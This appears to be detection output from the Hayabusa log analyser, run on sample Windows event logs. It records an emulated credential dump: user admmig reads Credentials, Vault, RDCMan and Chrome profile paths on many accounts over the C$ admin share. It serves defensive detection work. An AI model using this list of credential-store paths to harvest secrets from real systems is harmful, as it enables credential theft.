0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.940 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.956 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\admmig\AppData\Roaming\Microsoft\Credentials\4543CF9BB17D44B2079AB6013FE18370 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.537 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials\57D74E214C13D83D75A7EC9FC4F9BD50 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.568 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.568 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.568 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user 
file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.601 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.601 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.601 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.601 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.616 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.616 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\hack1\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.616 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig 
| Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.663 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.666 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.666 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.666 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Wlansvc\Profiles\Interfaces | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via 
network share.evtx +2021-12-12 20:53:14.682 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.682 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\Policy.vpol | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.702 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.702 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from 
Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.702 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:14.718 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\Policy.vpol | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.562 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.577 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\154E23D0-C644-4E6F-8CE6-5069272F999F.vsch | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.593 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.593 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\3CCD5499-87A8-4B10-A215-608888DD3B55.vsch | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.608 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\system32\config\systemprofile\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.608 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig 
| Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.624 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.624 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.640 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.642 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.642 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network 
share.evtx +2021-12-12 20:53:15.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user 
file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.689 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.689 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.689 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential 
